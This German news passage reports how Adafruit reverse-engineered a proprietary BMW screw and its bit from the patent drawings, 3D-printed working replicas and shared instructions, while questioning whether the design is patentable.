Adafruit hat die Patentanmeldung analysiert und darin einige Schwachstellen identifiziert. Demnach erfüllen viele Aspekte des BMW-Patents möglicherweise nicht die Kriterien für eine Patentfähigkeit. Das Schraubendesign sei primär kosmetisch und auf Branding fokussiert, nicht auf echte technische Innovation.
Aus technischer Sicht stellt die BMW-Schraube keine Verbesserung gegenüber existierenden Standards dar. Die Automobilindustrie hat sich weitgehend auf Torx- und Inbus-Schrauben standardisiert.
Community schlägt zurück
Adafruit demonstrierte die Verwundbarkeit von BMWs Ansatz durch erfolgreiches Reverse Engineering – nur anhand der Patentunterlagen. Das Unternehmen erstellte sowohl Plastik- als auch Metall-3D-Drucke der Schraube und des passenden Bits. Laut Adafruit funktionierten die Repliken einwandfrei.
Der Reverse-Engineering-Prozess nutzte die technischen Zeichnungen und Maße aus BMWs eigener Patentanmeldung. Diese ironische Situation illustriert eine fundamentale Herausforderung proprietärer Schrauben-Designs: Die öffentliche Patentanmeldung offenbart zwangsläufig die zur Reproduktion nötigen Informationen.
Adafruit hat jetzt auch Anleitungen für andere Maker bereitgestellt, die bereits aufgegriffen wurden. Weitere Personen haben bereits 3D-Dateien für Schrauben und Bits in Online-Repositories hochgeladen. Das mag eine Lösung für Hobbybastler sein, für professionelle Werkstätten aber eher eine Notlösung.